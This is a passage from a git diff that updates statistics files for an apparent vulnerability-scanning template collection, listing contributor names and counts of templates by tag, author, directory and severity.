seelan","count":1},{"name":"droberson","count":1},{"name":"tirtha","count":1},{"name":"juicypotato1","count":1},{"name":"co0nan","count":1},{"name":"shifacyclewla","count":1},{"name":"micha3lb3n","count":1},{"name":"juliosmelo","count":1},{"name":"gtrrnr","count":1},{"name":"becivells","count":1},{"name":"akash.c","count":1},{"name":"orpheus","count":1},{"name":"imhunterand","count":1},{"name":"jrolf","count":1},{"name":"ilovebinbash","count":1},{"name":"shiva (strobes security)","count":1},{"name":"barthy.koeln","count":1},{"name":"mah3sec_","count":1},{"name":"compr00t","count":1},{"name":"ramondunker","count":1},{"name":"furkansayim","count":1},{"name":"tarunkoyalwar","count":1},{"name":"kareemse1im","count":1},{"name":"undefl0w","count":1},{"name":"willd96","count":1},{"name":"ohlinge","count":1},{"name":"0xteles","count":1},{"name":"apt-mirror","count":1},{"name":"zinminphy0","count":1},{"name":"b4uh0lz","count":1},{"name":"un-fmunozs","count":1},{"name":"schniggie","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"f1she3","count":1},{"name":"0xtavian","count":1},{"name":"dievus","count":1},{"name":"nytr0gen","count":1},{"name":"aringo","count":1},{"name":"retr0","count":1},{"name":"jna1","count":1},{"name":"djoevanka","count":1},{"name":"berkdusunur","count":1},{"name":"notsoevilweasel","count":1},{"name":"bjhulst","count":1},{"name":"narluin","count":1},{"name":"aron molnar","count":1},{"name":"noraj","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"danigoland","count":1},{"name":"davidfegyver","count":1},{"name":"pascalheidmann","count":1},{"name":"esonhugh","count":1},{"name":"arjunchandarana","count":1},{"name":"ph33rr","count":1},{"name":"_c0wb0y_","count":1},{"name":"revblock","count":1},{"name":"adrianmf","count":1},{"name":"ndmalc","count":1},{"name":"pratik khalane","count":1},{"name":"momen eldawakhly","count":1},{"name":"petruknisme","count":1},{"name":"secthebit","count":1},{"name":"mantissts","count":1},{"name":"jteles","count":1},{"name":"kurohost","count":1},{"name":"qlkwej","count":1},{"name":"th3.d1p4k","count":1},{"name":"piyushchhiroliya","count":1},{"name":"dabla","count":1},{"name":"mabdullah22","count":1},{"name":"nerrorsec","count":1},{"name":"h4kux","count":1},{"name":"topscoder","count":1},{"name":"ptonewreckin","count":1},{"name":"patralos","count":1},{"name":"queencitycyber","count":1},{"name":"hanlaomo","count":1},{"name":"rodnt","count":1},{"name":"exceed","count":1},{"name":"mastercho","count":1},{"name":"zsusac","count":1},{"name":"elitebaz","count":1},{"name":"0xh7ml","count":1},{"name":"tirtha_mandal","count":1},{"name":"soyelmago","count":1},{"name":"carrot2","count":1},{"name":"ok_bye_now","count":1},{"name":"akokonunes","count":1},{"name":"whynotke","count":1},{"name":"shreyapohekar","count":1},{"name":"lark lab","count":1},{"name":"lixts","count":1},{"name":"metascan","count":1},{"name":"luqman","count":1},{"name":"ahmed sherif","count":1},{"name":"shelld3v","count":1},{"name":"daviey","count":1},{"name":"jaimin gondaliya","count":1},{"name":"0xd0ff9","count":1},{"name":"mr. bobo hp","count":1},{"name":"duty_1g","count":1},{"name":"sak1","count":1},{"name":"florianmaak","count":1},{"name":"prettyboyaaditya","count":1},{"name":"unkl4b","count":1},{"name":"1nf1n7y","count":1},{"name":"tehtbl","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"sleepingbag945","count":1},{"name":"ynnirc","count":1},{"name":"opencirt","count":1},{"name":"nobody","count":1},{"name":"yashgoti","count":1},{"name":"0xceba","count":1},{"name":"thevillagehacker","count":1},{"name":"supr4s","count":1},{"name":"erethon","count":1},{"name":"retr02332","count":1},{"name":"udyz","count":1},{"name":"pjborah","count":1},{"name":"kagamigawa","count":1},{"name":"wabafet","count":1},{"name":"dawid-czarnecki","count":1},{"name":"r3nz0","count":1},{"name":"higor melgaço","count":1},{"name":"unp4ck","count":1},{"name":"infosecsanyam","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"toufik-airane","count":1},{"name":"igibanez","count":1},{"name":"omarkurt","count":1},{"name":"ahmed abou-ela","count":1},{"name":"yashanand155","count":1},{"name":"0ut0fb4nd","count":1},{"name":"mhdsamx","count":1},{"name":"gboddin","count":1},{"name":"bartu utku sarp","count":1},{"name":"borna nematzadeh","count":1},{"name":"b0rn2r00t","count":1},{"name":"deena","count":1},{"name":"oscarintherocks","count":1},{"name":"alevsk","count":1},{"name":"nielsing","count":1},{"name":"bywalks","count":1},{"name":"gpiechnik2","count":1},{"name":"paper-pen","count":1},{"name":"ramkrishna sawant","count":1},{"name":"osamahamad","count":1},{"name":"aayush vishnoi","count":1},{"name":"furkansenan","count":1},{"name":"kabirsuda","count":1},{"name":"rotemreiss","count":1},{"name":"allenwest24","count":1},{"name":"jub0bs","count":1},{"name":"elmahdi","count":1},{"name":"bughuntersurya","count":1},{"name":"anon-artist","count":1},{"name":"xstp","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"rotembar","count":1},{"name":"tea","count":1},{"name":"mbmy","count":1},{"name":"kaizensecurity","count":1},{"name":"colbyjack1134","count":1},{"name":"ofjaaah","count":1},{"name":"jas37","count":1},{"name":"jbertman","count":1},{"name":"ayadi","count":1},{"name":"ipanda","count":1},{"name":"pussycat0","count":1},{"name":"ola456","count":1},{"name":"mrcl0wnlab","count":1},{"name":"geraldino2","count":1},{"name":"spac3wh1te","count":1},{"name":"jaskaran","count":1},{"name":"thelicato","count":1},{"name":"amanrawat","count":1},{"name":"majidmc2","count":1},{"name":"breno_css","count":1},{"name":"dali","count":1},{"name":"hakluke","count":1},{"name":"blckraven","count":1},{"name":"wlayzz","count":1},{"name":"patrick pirker","count":1},{"name":"sinsinology","count":1},{"name":"caon","count":1},{"name":"andirrahmani1","count":1},{"name":"aaronchen0","count":1},{"name":"xcapri","count":1},{"name":"intx0x80","count":1},{"name":"vinit989","count":1},{"name":"absshax","count":1},{"name":"pry0cc","count":1},{"name":"mariam tariq","count":1},{"name":"fq_hsu","count":1},{"name":"sec_hawk","count":1},{"name":"carlosvieira","count":1},{"name":"michael wedl","count":1},{"name":"iampritam","count":1},{"name":"daffianfo","count":1},{"name":"shiar","count":1},{"name":"d0rkerdevil","count":1},{"name":"lamscun","count":1},{"name":"andysvints","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"zeyad azima","count":1},{"name":"8authur","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"mass0ma","count":1},{"name":"official_blackhat13","count":1},{"name":"elder tao","count":1},{"name":"kailashbohara","count":1},{"name":"dmartyn","count":1},{"name":"aresx","count":1},{"name":"luskabol","count":1},{"name":"alexrydzak","count":1},{"name":"exploitation","count":1},{"name":"sicksec","count":1},{"name":"manasmbellani","count":1},{"name":"b0yd","count":1},{"name":"y0no","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"_harleo","count":1},{"name":"rivalsec","count":1},{"name":"remonsec","count":1},{"name":"kr1shna4garwal","count":1},{"name":"nagli","count":1},{"name":"hczdmr","count":1},{"name":"jc175","count":1},{"name":"izn0u","count":1},{"name":"akshansh","count":1},{"name":"0h1in9e","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"freakyclown","count":1},{"name":"alperenkesk","count":1},{"name":"myst7ic","count":1},{"name":"marcos_iaf","count":1},{"name":"fmunozs","count":1},{"name":"phyr3wall","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"ldionmarcil","count":1},{"name":"flag007","count":1},{"name":"ransomsec","count":1},{"name":"realexp3rt","count":1},{"name":"mubassirpatel","count":1},{"name":"justmumu","count":1},{"name":"th3r4id","count":1},{"name":"adamcrosser","count":1},{"name":"jbaines-r7","count":1},{"name":"couskito","count":1},{"name":"viondexd","count":1},{"name":"therealtoastycat","count":1},{"name":"dhiyaneshdki","count":1},{"name":"shivampand3y","count":1},{"name":"jeya.seelan","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"xeldax","count":1},{"name":"dk999","count":1}],"directory":[{"name":"http","count":5927},{"name":"workflows","count":190},{"name":"file","count":123},{"name":"network","count":96},{"name":"ssl","count":24},{"name":"dns","count":18},{"name":"headless","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"cves.json","count":1},{"name":"contributors.json","count":1}],"severity":[{"name":"info","count":2894},{"name":"high","count":1282},{"name":"medium","count":1063},{"name":"critical","count":710},{"name":"low","count":221},{"name":"unknown","count":27}],"types":[{"name":"file","count":123},{"name":"dns","count":18}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index b6232faf62..c1226ff6b5 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,3347 +1,3420 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------|-------|-------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 1855 | dhiyaneshdk | 835 | http | 5860 | info | 2857 | file | 123 | -| panel | 896 | dwisiswant0 | 794 | workflows | 190 | high | 1270 | dns | 18 | -| wordpress | 781 | daffainfo | 664 | file | 123 | medium | 1042 | | | -| exposure | 677 | pikpikcu | 353 | network | 93 | critical | 704 | | | -| wp-plugin | 672 | pdteam | 278 | dns | 18 | low | 216 | | | -| xss | 646 | pussycat0x | 240 | ssl | 12 | unknown | 26 | | | -| osint | 639 | geeknik | 220 | headless | 9 | | | | | -| tech | 602 | ricardomaia | 215 | TEMPLATES-STATS.json | 1 | | | | | -| edb | 596 | ritikchaddha | 210 | contributors.json | 1 | | | | | -| lfi | 548 | 0x_akoko | 179 | cves.json | 1 | | | | | -| cve2021 | 431 | theamanrawat | 166 | | | | | | | -| rce | 415 | princechaddha | 155 | | | | | | | -| cve2022 | 397 | gy741 | 144 | | | | | | | +| cve | 1882 | dhiyaneshdk | 867 | http | 5927 | info | 2894 | file | 123 | +| panel | 904 | dwisiswant0 | 794 | workflows | 190 | high | 1282 | dns | 18 | +| wordpress | 785 | daffainfo | 664 | file | 123 | medium | 1063 | | | +| exposure | 689 | pikpikcu | 353 | network | 96 | critical | 710 | | | +| wp-plugin | 676 | pdteam | 278 | ssl | 24 | low | 221 | | | +| osint | 652 | pussycat0x | 255 | dns | 18 | unknown | 27 | | | +| xss | 648 | geeknik | 221 | headless | 9 | | | | | +| tech | 612 | ricardomaia | 219 | TEMPLATES-STATS.json | 1 | | | | | +| edb | 597 | ritikchaddha | 215 | contributors.json | 1 | | | | | +| lfi | 551 | 0x_akoko | 179 | cves.json | 1 | | | | | +| cve2021 | 433 | theamanrawat | 166 | | | | | | | +| rce | 421 | princechaddha | 156 | | | | | | | +| cve2022 | 400 | gy741 | 144 | | | | | | | | packetstorm | 369 | arafatansari | 119 | | | | | | | -| wpscan | 347 | tess | 108 | | | | | | | -| misconfig | 293 | madrobot | 65 | | | | | | | -| wp | 288 | zzeitlin | 64 | | | | | | | -| unauth | 266 | idealphase | 63 | | | | | | | +| wpscan | 348 | tess | 108 | | | | | | | +| misconfig | 302 | madrobot | 65 | | | | | | | +| wp | 290 | zzeitlin | 64 | | | | | | | +| unauth | 268 | idealphase | 63 | | | | | | | | token-spray | 240 | akincibor | 58 | | | | | | | | cve2020 | 237 | for3stco1d | 55 | | | | | | | -| osint-social | 206 | r3y3r53 | 51 | | | | | | | -| top-200 | 205 | gaurang | 42 | | | | | | | -| kev | 199 | philippedelteil | 41 | | | | | | | -| sqli | 195 | edoardottt | 40 | | | | | | | -| authenticated | 195 | righettod | 40 | | | | | | | -| | 193 | c-sh0 | 35 | | | | | | | -| config | 192 | pdresearch | 35 | | | | | | | -| oast | 164 | adam crosser | 31 | | | | | | | -| token | 157 | ice3man | 26 | | | | | | | -| cve2018 | 150 | iamnoooob | 25 | | | | | | | +| top-200 | 207 | r3y3r53 | 51 | | | | | | | +| osint-social | 207 | gaurang | 42 | | | | | | | +| kev | 200 | philippedelteil | 41 | | | | | | | +| sqli | 199 | righettod | 41 | | | | | | | +| authenticated | 196 | edoardottt | 40 | | | | | | | +| | 194 | pdresearch | 37 | | | | | | | +| config | 193 | c-sh0 | 35 | | | | | | | +| oast | 166 | adam crosser | 31 | | | | | | | +| token | 157 | iamnoooob | 27 | | | | | | | +| apache | 151 | ice3man | 26 | | | | | | | +| cve2018 | 150 | rootxharsh | 26 | | | | | | | | iot | 149 | hardik-solanki | 24 | | | | | | | -| cve2019 | 147 | pwnhxl | 24 | | | | | | | -| apache | 147 | organiccrap | 24 | | | | | | | -| default-login | 146 | rootxharsh | 23 | | | | | | | -| joomla | 136 | ffffffff0x | 22 | | | | | | | -| file | 128 | techbrunchfr | 22 | | | | | | | -| login | 116 | johnk3r | 20 | | | | | | | +| cve2019 | 148 | pwnhxl | 24 | | | | | | | +| default-login | 147 | organiccrap | 24 | | | | | | | +| joomla | 136 | techbrunchfr | 23 | | | | | | | +| file | 128 | johnk3r | 22 | | | | | | | +| login | 125 | ffffffff0x | 22 | | | | | | | +| redirect | 114 | j4vaovo | 19 | | | | | | | | cve2010 | 112 | cckuailong | 18 | | | | | | | -| redirect | 102 | sullo | 17 | | | | | | | -| top-100 | 100 | j4vaovo | 16 | | | | | | | +| top-100 | 100 | sullo | 18 | | | | | | | | files | 100 | parthmalhotra | 16 | | | | | | | -| network | 99 | pr3r00t | 15 | | | | | | | | router | 97 | random-robbie | 15 | | | | | | | -| cms | 93 | sheikhrishad | 15 | | | | | | | -| ssrf | 92 | milo2012 | 14 | | | | | | | +| cms | 95 | pr3r00t | 15 | | | | | | | +| ssrf | 94 | sheikhrishad | 15 | | | | | | | +| network | 94 | ctflearner | 14 | | | | | | | | auth-bypass | 79 | r3dg33k | 14 | | | | | | | -| devops | 77 | theabhinavgaur | 13 | | | | | | | -| cve2017 | 76 | sharath | 13 | | | | | | | -| takeover | 73 | 0ri2n | 13 | | | | | | | -| install | 69 | melbadry9 | 13 | | | | | | | -| disclosure | 66 | tenbird | 13 | | | | | | | -| cve2023 | 66 | suman_kar | 12 | | | | | | | -| oracle | 65 | cyllective | 11 | | | | | | | -| intrusive | 65 | dogasantos | 11 | | | | | | | -| seclists | 60 | lu4nx | 11 | | | | | | | -| oss | 57 | elsfa7110 | 11 | | | | | | | -| cve2015 | 54 | wdahlenb | 11 | | | | | | | -| google | 53 | hackergautam | 10 | | | | | | | -| cisco | 51 | alph4byt3 | 10 | | | | | | | -| cve2016 | 51 | nadino | 10 | | | | | | | -| adobe | 50 | co5mos | 10 | | | | | | | -| fileupload | 49 | random_robbie | 10 | | | | | | | -| logs | 46 | meme-lord | 10 | | | | | | | -| tenable | 46 | logicalhunter | 10 | | | | | | | -| osint-gaming | 45 | 0x240x23elu | 9 | | | | | | | +| cve2017 | 77 | milo2012 | 14 | | | | | | | +| devops | 77 | sharath | 13 | | | | | | | +| cve2023 | 76 | tenbird | 13 | | | | | | | +| takeover | 73 | melbadry9 | 13 | | | | | | | +| install | 69 | 0ri2n | 13 | | | | | | | +| intrusive | 69 | theabhinavgaur | 13 | | | | | | | +| disclosure | 66 | suman_kar | 12 | | | | | | | +| oracle | 65 | lu4nx | 12 | | | | | | | +| seclists | 60 | cyllective | 11 | | | | | | | +| oss | 57 | dogasantos | 11 | | | | | | | +| cve2015 | 54 | elsfa7110 | 11 | | | | | | | +| cisco | 53 | wdahlenb | 11 | | | | | | | +| google | 53 | alph4byt3 | 10 | | | | | | | +| cve2016 | 52 | hackergautam | 10 | | | | | | | +| adobe | 50 | meme-lord | 10 | | | | | | | +| fileupload | 49 | nadino | 10 | | | | | | | +| tenable | 46 | random_robbie | 10 | | | | | | | +| logs | 46 | logicalhunter | 10 | | | | | | | +| detect | 45 | co5mos | 10 | | | | | | | +| osint-gaming | 45 | 0xpugazh | 9 | | | | | | | | vulhub | 44 | emadshanab | 9 | | | | | | | -| debug | 44 | nullfuzz | 9 | | | | | | | -| atlassian | 44 | oppsec | 9 | | | | | | | -| aem | 44 | fabaff | 9 | | | | | | | +| atlassian | 44 | 0x240x23elu | 9 | | | | | | | +| debug | 44 | oppsec | 9 | | | | | | | +| aem | 44 | nullfuzz | 9 | | | | | | | +| vmware | 43 | fabaff | 9 | | | | | | | | plugin | 43 | zh | 8 | | | | | | | -| cve2014 | 42 | iamthefrogy | 8 | | | | | | | -| hackerone | 42 | veshraj | 8 | | | | | | | -| osint-porn | 42 | 0xpugazh | 8 | | | | | | | -| osint-hobby | 42 | _0xf4n9x_ | 8 | | | | | | | -| vmware | 42 | that_juan_ | 8 | | | | | | | -| detect | 40 | olearycrew | 8 | | | | | | | -| huntr | 40 | aashiq | 8 | | | | | | | -| generic | 37 | kophjager007 | 7 | | | | | | | -| traversal | 37 | leovalcante | 7 | | | | | | | -| jira | 36 | dr_set | 7 | | | | | | | -| springboot | 36 | amit-jd | 7 | | | | | | | -| osint-misc | 35 | techryptic (@tech) | 7 | | | | | | | -| kubernetes | 35 | caspergn | 7 | | | | | | | -| injection | 34 | randomstr1ng | 7 | | | | | | | -| listing | 33 | harshbothra_ | 7 | | | | | | | -| aws | 31 | its0x08 | 7 | | | | | | | -| deserialization | 31 | divya_mudgal | 7 | | | | | | | -| dns | 28 | ja1sh | 6 | | | | | | | -| log4j | 28 | nodauf | 6 | | | | | | | -| osint-coding | 28 | justaacat | 6 | | | | | | | -| sap | 28 | gitlab red team | 6 | | | | | | | -| osint-tech | 28 | puzzlepeaches | 6 | | | | | | | -| cnvd | 27 | praetorian-thendrickson | 6 | | | | | | | -| gitlab | 27 | xelkomy | 6 | | | | | | | -| jndi | 25 | pathtaga | 6 | | | | | | | +| osint-hobby | 42 | veshraj | 8 | | | | | | | +| cve2014 | 42 | _0xf4n9x_ | 8 | | | | | | | +| osint-porn | 42 | aashiq | 8 | | | | | | | +| hackerone | 42 | olearycrew | 8 | | | | | | | +| huntr | 40 | iamthefrogy | 8 | | | | | | | +| traversal | 37 | that_juan_ | 8 | | | | | | | +| generic | 37 | leovalcante | 7 | | | | | | | +| springboot | 36 | caspergn | 7 | | | | | | | +| jira | 36 | techryptic (@tech) | 7 | | | | | | | +| kubernetes | 35 | randomstr1ng | 7 | | | | | | | +| osint-misc | 35 | harshbothra_ | 7 | | | | | | | +| injection | 34 | kophjager007 | 7 | | | | | | | +| listing | 33 | dr_set | 7 | | | | | | | +| aws | 33 | its0x08 | 7 | | | | | | | +| deserialization | 31 | amit-jd | 7 | | | | | | | +| sap | 29 | divya_mudgal | 7 | | | | | | | +| osint-coding | 29 | imnightmaree | 6 | | | | | | | +| osint-tech | 28 | pathtaga | 6 | | | | | | | +| log4j | 28 | puzzlepeaches | 6 | | | | | | | +| cnvd | 27 | justaacat | 6 | | | | | | | +| gitlab | 27 | nodauf | 6 | | | | | | | +| misc | 26 | xelkomy | 6 | | | | | | | +| microsoft | 26 | evan rubinstein | 6 | | | | | | | | fuzz | 25 | forgedhallpass | 6 | | | | | | | -| php | 25 | pentest_swissky | 6 | | | | | | | -| proxy | 25 | devang-solanki | 6 | | | | | | | -| misc | 25 | clem9669 | 6 | | | | | | | -| microsoft | 25 | evan rubinstein | 6 | | | | | | | -| osint-shopping | 24 | imnightmaree | 6 | | | | | | | -| osint-finance | 24 | __fazal | 6 | | | | | | | -| manageengine | 24 | podalirius | 5 | | | | | | | -| osint-images | 24 | kh4sh3i | 5 | | | | | | | -| firewall | 24 | panch0r3d | 5 | | | | | | | -| zoho | 23 | joanbono | 5 | | | | | | | -| api | 23 | yanyun | 5 | | | | | | | -| osint-business | 23 | s0obi | 5 | | | | | | | -| k8s | 23 | prajiteshsingh | 5 | | | | | | | -| wp-theme | 22 | ganofins | 5 | | | | | | | -| amazon | 21 | r12w4n | 5 | | | | | | | -| weblogic | 21 | robotshell | 5 | | | | | | | -| ibm | 21 | dolev farhi | 4 | | | | | | | -| cve2012 | 21 | r3naissance | 4 | | | | | | | -| cloud | 21 | tanq16 | 4 | | | | | | | -| fortinet | 20 | mr-xn | 4 | | | | | | | -| msf | 20 | powerexploit | 4 | | | | | | | -| tomcat | 20 | shine | 4 | | | | | | | -| cicd | 20 | e_schultze_ | 4 | | | | | | | -| github | 19 | incogbyte | 4 | | | | | | | -| dlink | 19 | defr0ggy | 4 | | | | | | | -| jenkins | 19 | scent2d | 4 | | | | | | | +| proxy | 25 | __fazal | 6 | | | | | | | +| php | 25 | clem9669 | 6 | | | | | | | +| jndi | 25 | ja1sh | 6 | | | | | | | +| api | 24 | praetorian-thendrickson | 6 | | | | | | | +| osint-shopping | 24 | gitlab red team | 6 | | | | | | | +| osint-finance | 24 | pentest_swissky | 6 | | | | | | | +| manageengine | 24 | devang-solanki | 6 | | | | | | | +| osint-business | 24 | panch0r3d | 5 | | | | | | | +| osint-images | 24 | r12w4n | 5 | | | | | | | +| firewall | 24 | joanbono | 5 | | | | | | | +| zoho | 23 | yanyun | 5 | | | | | | | +| k8s | 23 | kh4sh3i | 5 | | | | | | | +| cve2012 | 23 | robotshell | 5 | | | | | | | +| amazon | 23 | s0obi | 5 | | | | | | | +| wp-theme | 22 | defr0ggy | 5 | | | | | | | +| msf | 21 | prajiteshsingh | 5 | | | | | | | +| tomcat | 21 | podalirius | 5 | | | | | | | +| ibm | 21 | vicrack | 5 | | | | | | | +| weblogic | 21 | mr-xn | 5 | | | | | | | +| cloud | 21 | ganofins | 5 | | | | | | | +| c2 | 21 | wisnupramoedya | 4 | | | | | | | +| fortinet | 20 | tanq16 | 4 | | | | | | | +| cicd | 20 | shine | 4 | | | | | | | +| dlink | 19 | powerexploit | 4 | | | | | | | | camera | 19 | 3th1c_yuk1 | 4 | | | | | | | -| struts | 19 | wisnupramoedya | 4 | | | | | | | -| service | 18 | h1ei1 | 4 | | | | | | | -| ftp | 18 | dadevel | 4 | | | | | | | -| osint-music | 18 | ctflearner | 3 | | | | | | | -| wavlink | 18 | splint3r7 | 3 | | | | | | | -| lfr | 17 | fxploit | 3 | | | | | | | -| printer | 16 | shifacyclewala | 3 | | | | | | | -| cve2011 | 16 | mavericknerd | 3 | | | | | | | -| backup | 16 | whoever | 3 | | | | | | | -| xxe | 16 | jarijaas | 3 | | | | | | | -| osint-blog | 16 | yash anand @yashanand155 | 3 | | | | | | | -| ssl | 16 | andydoering | 3 | | | | | | | -| admin | 16 | ph33r | 3 | | | | | | | -| nginx | 16 | fyoorer | 3 | | | | | | | -| cve2009 | 15 | skeltavik | 3 | | | | | | | -| status | 15 | lucasljm2001 | 3 | | | | | | | -| android | 15 | alifathi-h1 | 3 | | | | | | | -| woocommerce | 14 | ekrause | 3 | | | | | | | -| hp | 14 | arcc | 3 | | | | | | | -| osint-health | 14 | me9187 | 3 | | | | | | | -| jboss | 14 | canberbamber | 3 | | | | | | | -| cve2013 | 14 | cheesymoon | 3 | | | | | | | -| mail | 14 | swissky | 3 | | | | | | | -| citrix | 14 | huowuzhao | 3 | | | | | | | -| zyxel | 14 | emenalf | 3 | | | | | | | -| domainmod | 14 | 0w4ys | 3 | | | | | | | -| confluence | 14 | k0pak4 | 3 | | | | | | | -| audit | 14 | johnjhacking | 3 | | | | | | | -| java | 14 | impramodsargar | 3 | | | | | | | +| struts | 19 | h1ei1 | 4 | | | | | | | +| jenkins | 19 | dolev farhi | 4 | | | | | | | +| dns | 19 | r3naissance | 4 | | | | | | | +| github | 19 | dadevel | 4 | | | | | | | +| ssl | 19 | scent2d | 4 | | | | | | | +| wavlink | 18 | e_schultze_ | 4 | | | | | | | +| osint-music | 18 | incogbyte | 4 | | | | | | | +| service | 18 | unstabl3 | 3 | | | | | | | +| ftp | 18 | ph33r | 3 | | | | | | | +| ir | 17 | fxploit | 3 | | | | | | | +| admin | 17 | me9187 | 3 | | | | | | | +| lfr | 17 | true13 | 3 | | | | | | | +| cve2011 | 17 | _generic_human_ | 3 | | | | | | | +| xxe | 16 | johnjhacking | 3 | | | | | | | +| osint-blog | 16 | canberbamber | 3 | | | | | | | +| cve2009 | 16 | bernardofsr | 3 | | | | | | | +| printer | 16 | lark-lab | 3 | | | | | | | +| nginx | 16 | ekrause | 3 | | | | | | | +| backup | 16 | badboycxcc | 3 | | | | | | | +| hp | 15 | taielab | 3 | | | | | | | +| cve2008 | 15 | splint3r7 | 3 | | | | | | | +| status | 15 | mavericknerd | 3 | | | | | | | +| magento | 15 | matt galligan | 3 | | | | | | | +| android | 15 | vsh00t | 3 | | | | | | | +| jboss | 14 | f1tz | 3 | | | | | | | +| woocommerce | 14 | skeltavik | 3 | | | | | | | +| mail | 14 | evergreencartoons | 3 | | | | | | | +| citrix | 14 | jarijaas | 3 | | | | | | | +| java | 14 | lucasljm2001 | 3 | | | | | | | +| osint-health | 14 | 0w4ys | 3 | | | | | | | +| zyxel | 14 | k0pak4 | 3 | | | | | | | +| cve2013 | 14 | huowuzhao | 3 | | | | | | | | osint-art | 14 | thomas_from_offensity | 3 | | | | | | | -| cuppa | 13 | lark-lab | 3 | | | | | | | -| fortigate | 13 | ambassify | 3 | | | | | | | +| domainmod | 14 | sushantkamble | 3 | | | | | | | +| audit | 14 | cheesymoon | 3 | | | | | | | +| confluence | 14 | ambassify | 3 | | | | | | | | osint-dating | 13 | dr0pd34d | 3 | | | | | | | -| login-check | 13 | vagnerd | 3 | | | | | | | -| laravel | 13 | true13 | 3 | | | | | | | -| cve2008 | 13 | matt galligan | 3 | | | | | | | -| abstractapi | 13 | unstabl3 | 3 | | | | | | | -| osint-political | 13 | f1tz | 3 | | | | | | | -| azure | 13 | vsh00t | 3 | | | | | | | -| magento | 13 | yuzhe-zhang-0 | 3 | | | | | | | -| creds-stuffing | 13 | evergreencartoons | 3 | | | | | | | -| grafana | 12 | dudez | 3 | | | | | | | -| ruby | 12 | bernardofsr | 3 | | | | | | | -| netgear | 12 | atomiczsec | 3 | | | | | | | -| backdoor | 12 | sushantkamble | 3 | | | | | | | -| rails | 12 | davidmckennirey | 3 | | | | | | | -| graphql | 12 | badboycxcc | 3 | | | | | | | -| ruijie | 12 | z3bd | 3 | | | | | | | -| vpn | 12 | hahwul | 3 | | | | | | | -| drupal | 12 | binaryfigments | 3 | | | | | | | -| kafka | 12 | _generic_human_ | 3 | | | | | | | -| airflow | 12 | taielab | 3 | | | | | | | -| auth | 12 | w4cky_ | 2 | | | | | | | -| webserver | 12 | socketz | 2 | | | | | | | -| git | 12 | c3l3si4n | 2 | | | | | | | -| netsweeper | 12 | korteke | 2 | | | | | | | -| microweber | 12 | megamansec | 2 | | | | | | | -| npm | 11 | 0xrudra | 2 | | | | | | | -| coldfusion | 11 | danielmofer | 2 | | | | | | | -| cisa | 11 | cckuakilong | 2 | | | | | | | -| xstream | 11 | lum8rjack | 2 | | | | | | | -| osint-video | 11 | gal nagli | 2 | | | | | | | -| online-fire-reporting | 11 | myztique | 2 | | | | | | | -| enum | 11 | randomrobbie | 2 | | | | | | | -| cnvd2021 | 11 | zomsop82 | 2 | | | | | | | -| dashboard | 11 | y4er | 2 | | | | | | | -| setup | 11 | joshlarsen | 2 | | | | | | | -| phpmyadmin | 11 | arm!tage | 2 | | | | | | | -| jolokia | 10 | x1m_martijn | 2 | | | | | | | -| dedecms | 10 | 0xprial | 2 | | | | | | | -| dell | 10 | pxmme1337 | 2 | | | | | | | -| headless | 10 | notnotnotveg | 2 | | | | | | | -| digitalocean | 10 | joshua rogers | 2 | | | | | | | -| sonicwall | 10 | dahse89 | 2 | | | | | | | -| ssh | 10 | github.com/its0x08 | 2 | | | | | | | -| glpi | 10 | moritz nentwig | 2 | | | | | | | -| django | 10 | hackerarpan | 2 | | | | | | | -| ssti | 10 | heeress | 2 | | | | | | | -| zimbra | 10 | thardt-praetorian | 2 | | | | | | | -| spring | 10 | ajaysenr | 2 | | | | | | | -| docker | 10 | afaq | 2 | | | | | | | -| pfsense | 9 | bananabr | 2 | | | | | | | -| prometheus | 9 | vavkamil | 2 | | | | | | | -| solarview | 9 | brenocss | 2 | | | | | | | -| fastjson | 9 | joeldeleep | 2 | | | | | | | -| vcenter | 9 | lotusdll | 2 | | | | | | | -| sitecore | 9 | thezakman | 2 | | | | | | | -| iis | 9 | clarkvoss | 2 | | | | | | | -| versa | 9 | dbrwsky | 2 | | | | | | | -| osint-news | 9 | g4l1t0 | 2 | | | | | | | -| wso2 | 9 | geekby | 2 | | | | | | | -| installer | 9 | paperpen | 2 | | | | | | | -| gitea | 9 | hetroublemakr | 2 | | | | | | | -| opencats | 9 | raesene | 2 | | | | | | | -| symfony | 9 | streetofhackerr007 | 2 | | | | | | | -| windows | 9 | 666asd | 2 | | | | | | | -| firebase | 9 | foulenzer | 2 | | | | | | | -| scada | 9 | bing0o | 2 | | | | | | | -| cache | 9 | supras | 2 | | | | | | | -| thinkphp | 9 | sinkettu | 2 | | | | | | | -| zabbix | 9 | bp0lr | 2 | | | | | | | -| kube | 9 | mohammedsaneem | 2 | | | | | | | -| unauthenticated | 8 | kishore-hariram | 2 | | | | | | | -| icewarp | 8 | martincodes-de | 2 | | | | | | | -| bucket | 8 | nuk3s3c | 2 | | | | | | | -| spotweb | 8 | koti2 | 2 | | | | | | | -| elasticsearch | 8 | sascha brendel | 2 | | | | | | | -| metadata | 8 | 0xnirvana | 2 | | | | | | | -| druid | 8 | udit_thakkur | 2 | | | | | | | -| bypass | 8 | rafaelwdornelas | 2 | | | | | | | -| jetbrains | 8 | manas_harsh | 2 | | | | | | | -| smtp | 8 | kiblyn11 | 2 | | | | | | | -| hms | 8 | redteambrasil | 2 | | | | | | | -| redis | 8 | d4vy | 2 | | | | | | | -| recon | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| ecology | 8 | n-thumann | 2 | | | | | | | -| atom | 8 | j3ssie | 2 | | | | | | | +| cuppa | 13 | emenalf | 3 | | | | | | | +| laravel | 13 | hahwul | 3 | | | | | 